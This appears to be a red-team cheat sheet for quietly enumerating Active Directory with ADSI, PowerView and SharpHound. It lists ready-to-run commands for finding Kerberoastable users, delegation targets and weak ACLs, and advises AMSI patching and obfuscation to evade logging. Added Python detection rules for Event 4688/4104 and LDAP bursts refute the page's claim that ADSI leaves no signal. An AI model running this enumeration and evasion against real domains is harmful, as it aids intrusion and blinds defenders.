AD Enumeration
LotL OPSEC
Living off the Land — ADSI, PowerView, BloodHound
True Living off the Land (ADSI & .NET)
Using net.exe or whoami.exe leaves Event ID 4688 (Process Creation) logs behind. LDAP queries issued through native .NET ADSI are sent straight from memory, so process-creation monitoring is bypassed entirely.
ADSI queries look like ordinary domain LDAP traffic. There is no suspicious signal for the SOC.
```powershell
# [OPSEC] Identify the current user without running whoami.exe
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
# [ADSI] Quietly enumerate the Domain Admins group
$Group = [ADSI]"LDAP://CN=Domain Admins,CN=Users,DC=domain,DC=local"
$Group.Member
# [ADSI] Find all domain users via raw LDAP
$Searcher = [adsisearcher]"(&(objectCategory=person)(objectClass=user))"
$Searcher.FindAll() | ForEach-Object { $_.Properties.name }
# [ADSI] Find users with an SPN (Kerberoastable) without PowerView
$Searcher = [adsisearcher]"(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$Searcher.FindAll() | ForEach-Object { $_.Properties.samaccountname }
```
Advanced PowerView (In-Memory)
Run the AMSI bypass in memory before loading PowerView. Instead of dumping the whole domain at once, use precise, targeted queries.
Loading in memory via IEX (iwr ...) instead of Import-Module drops no file to disk.
```powershell
# Import PowerView (Import-Module reads the file from disk; the note above prefers an in-memory load)
Import-Module .\PowerView.ps1 -DisableNameChecking
# Find Kerberoastable users and their SPNs
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname
# Find AS-REP Roastable users
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname
# Look for passwords left in user description fields
Get-DomainUser | Where-Object {$_.description -ne $null} | Select-Object samaccountname, description
# Find hosts with Unconstrained Delegation enabled
Get-DomainComputer -Unconstrained | Select-Object name, dnshostname
# Find RBCD (Resource-Based Constrained Delegation) targets
Get-DomainComputer | Where-Object {$_."msds-allowedtoactonbehalfofotheridentity"} | Select-Object name
# Find dangerous ACLs (GenericAll, WriteDacl, etc.)
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -eq "TargetUser"}
```
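The two sections above treat Event 4688 as the only relevant telemetry and present in-memory ADSI as leaving no signal. From the defender's side that holds only for process-creation monitoring: PowerShell Script Block Logging (Event 4104) records the script text itself, including the `[adsisearcher]` filter string and PowerView cmdlet names, whether or not a child process is spawned, and 4688 carries the command line only when the "Include command line in process creation events" audit policy is enabled. The following Python is an added example, not code from this page, PowerView or BloodHound: it runs simple rules over constructed 4688 and 4104 records (the dict layout, hostnames and user names are assumptions) and escalates any host that trips more than one rule.

```python
import re
from dataclasses import dataclass

# Event 4688 (process creation with command-line auditing on): the LOLBins the
# page names, with the /domain switch that turns net.exe into an AD query.
PROCESS_RULES = {
    "net_domain_query": re.compile(r"\bnet1?(?:\.exe)?\s+(?:user|group|localgroup)\b.*\s/domain\b", re.I),
    "whoami":           re.compile(r"\bwhoami(?:\.exe)?\b", re.I),
}

# Event 4104 (script block logging): the script text is logged even when no
# child process is created, so in-memory ADSI and PowerView still leave it.
SCRIPT_RULES = {
    "adsi_searcher": re.compile(r"\[adsisearcher\]|DirectoryServices\.DirectorySearcher|LDAP://", re.I),
    "spn_sweep":     re.compile(r"servicePrincipalName=\*", re.I),
    "asrep_sweep":   re.compile(r"userAccountControl:1\.2\.840\.113556\.1\.4\.803:=4194304", re.I),
    "powerview":     re.compile(r"\b(?:Get-Domain(?:User|Computer|Group)|Find-InterestingDomainAcl|Get-NetSession|Invoke-BloodHound)\b", re.I),
    "amsi_tamper":   re.compile(r"AmsiScanBuffer|AmsiUtils", re.I),
}

@dataclass
class Finding:
    host: str
    user: str
    event_id: int
    rule: str
    evidence: str

def evaluate(events):
    """Apply the rules to event dicts. Constructed format (an assumption):
    event_id, host, user, plus command_line for 4688 or script_block for 4104."""
    findings = []
    for ev in events:
        if ev["event_id"] == 4688:
            text, rules = ev.get("command_line", ""), PROCESS_RULES
        elif ev["event_id"] == 4104:
            text, rules = ev.get("script_block", ""), SCRIPT_RULES
        else:
            continue
        for name, pattern in rules.items():
            if pattern.search(text):
                findings.append(Finding(ev["host"], ev["user"], ev["event_id"], name, text[:80]))
    return findings

def score_hosts(findings, escalate_at=2):
    """Hosts that trip escalate_at or more distinct rules get 'escalate', others 'review'."""
    rules_by_host = {}
    for f in findings:
        rules_by_host.setdefault(f.host, set()).add(f.rule)
    return {h: ("escalate" if len(r) >= escalate_at else "review") for h, r in rules_by_host.items()}

# Constructed sample records; hosts, users and command lines are made up.
SAMPLE_EVENTS = [
    {"event_id": 4688, "host": "WS01", "user": "CORP\\alice",
     "command_line": 'net  group "Domain Admins" /domain'},
    {"event_id": 4688, "host": "WS01", "user": "CORP\\alice",
     "command_line": "C:\\Windows\\System32\\whoami.exe /groups"},
    {"event_id": 4104, "host": "WS02", "user": "CORP\\bob",
     "script_block": '$s=[adsisearcher]"(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))";$s.FindAll()'},
    {"event_id": 4104, "host": "WS02", "user": "CORP\\bob",
     "script_block": "Get-DomainUser -PreauthNotRequired | Select-Object samaccountname"},
    {"event_id": 4688, "host": "WS03", "user": "CORP\\svc-backup",
     "command_line": "C:\\Windows\\System32\\whoami.exe"},
    {"event_id": 4104, "host": "WS03", "user": "CORP\\svc-backup",
     "script_block": "Get-ChildItem C:\\Backups | Measure-Object"},
    {"event_id": 4688, "host": "WS04", "user": "CORP\\svc-backup",
     "command_line": "C:\\Windows\\System32\\robocopy.exe D:\\data E:\\data"},
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f.host:5} {f.event_id} {f.rule:17} {f.evidence}")
    print(score_hosts(evaluate(SAMPLE_EVENTS)))
```

A single `whoami` on a service account is noise in most estates, which is why the host score only escalates on two distinct rules; the `asrep_sweep` rule is there because the raw LDAP form of the PowerView `-PreauthNotRequired` query is what a script block will actually contain when PowerView is not used.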
BloodHound / SharpHound (OPSEC Modes)
Running SharpHound.exe -c All produces a large spike in LDAP queries, and its SAMR requests are watched by the SOC. Use targeted collection methods.
DCOnly collection: LDAP queries to the DC only. It does not touch workstations and uses no SAMR, which makes it the least noisy method.
```powershell
# [OPSEC] Stealth collection: LDAP only, no workstation or SAMR contact
Invoke-BloodHound -CollectionMethod DCOnly -OutputDirectory C:\Windows\Temp\
# [OPSEC] Targeted session collection: high-value targets only
Invoke-BloodHound -CollectionMethod Session -ComputerFile targets.txt
# Session enumeration through the native API without SharpHound
Get-NetSession -ComputerName TARGET_FILE_SERVER
```
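DCOnly collection avoids SAMR and workstation contact, but every LDAP search still arrives at the domain controller, where it can be logged (Directory Service Event 1644 once Field Engineering diagnostic logging is enabled) or captured by a network sensor; from the DC's point of view the "least noisy" collector is still a client that walks every user, computer and group in a few seconds. The following Python is an added example, not from this page or SharpHound. It baselines per-client LDAP search volume over a sliding window and flags a client that issues a burst of broad, whole-class filters; the record tuples, timestamps, client addresses and filters are all constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# A filter is "broad" when it selects a whole object class without narrowing
# on a specific name or DN; whole-domain collectors emit exactly these shapes.
BROAD_CLASS = re.compile(r"\(object(?:Class|Category)=(?:\*|user|person|computer|group)\)", re.I)
NARROWING = re.compile(r"\((?:sAMAccountName|cn|distinguishedName|objectSid|name)=", re.I)

def is_broad(ldap_filter: str) -> bool:
    return bool(BROAD_CLASS.search(ldap_filter)) and not NARROWING.search(ldap_filter)

def detect_spikes(records, window_seconds=60):
    """Peak number of searches each client issued inside any window of
    window_seconds (endpoints inclusive). records: (datetime, client_ip, filter)."""
    per_client = defaultdict(list)
    for ts, client, _ in records:
        per_client[client].append(ts)
    peaks = {}
    for client, stamps in per_client.items():
        window = deque()
        peak = 0
        for ts in sorted(stamps):
            window.append(ts)
            while ts - window[0] > timedelta(seconds=window_seconds):
                window.popleft()
            peak = max(peak, len(window))
        peaks[client] = peak
    return peaks

def flag_clients(records, window_seconds=60, threshold=20):
    """Clients whose peak exceeds threshold, with a count of their broad filters."""
    peaks = detect_spikes(records, window_seconds)
    broad = defaultdict(int)
    for _, client, f in records:
        if is_broad(f):
            broad[client] += 1
    return {c: {"peak": p, "broad_filters": broad[c]} for c, p in peaks.items() if p > threshold}

# Constructed sample: two workstations doing ordinary lookups every 30 s,
# and one host pulling every user, computer and group within 30 s.
_T0 = datetime(2024, 1, 1, 9, 0, 0)
RECORDS = []
for i in range(10):
    RECORDS.append((_T0 + timedelta(seconds=30 * i), "10.0.1.15", "(&(objectClass=user)(sAMAccountName=alice))"))
    RECORDS.append((_T0 + timedelta(seconds=30 * i), "10.0.1.16", "(&(objectClass=computer)(cn=WS16))"))
_BURST = ["(&(objectCategory=person)(objectClass=user))", "(objectClass=computer)", "(objectClass=group)"]
for i in range(30):
    RECORDS.append((_T0 + timedelta(seconds=i), "10.0.5.23", _BURST[i % 3]))

if __name__ == "__main__":
    print(detect_spikes(RECORDS))
    print(flag_clients(RECORDS))
```

The threshold is deliberately a parameter: the right value comes from a baseline of the estate's own DCs, and a ticket is only worth raising when a high peak coincides with mostly broad filters, since monitoring agents and Exchange also produce bursts of narrow lookups.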
OPSEC Notes & Telemetry Matrix
| Technique | Risk | EDR Telemetry | OPSEC Fix |
|---|---|---|---|
| net.exe / whoami.exe | High | Event 4688 (Process Creation). Monitored by EDR. | Use [ADSI] and WindowsIdentity. |
| SharpHound (-c All) | High | Large LDAP traffic spike. Event 4624/4634 on every host. | -c DCOnly or targeted session collection. |
| PowerView | Medium | Event 4104 (PowerShell Script Block Logging). | AMSI patch, obfuscation, variable rename. |
| Native ADSI ([adsi]) | Very Low | Looks like ordinary domain LDAP traffic. | N/A; the stealthiest enumeration method. |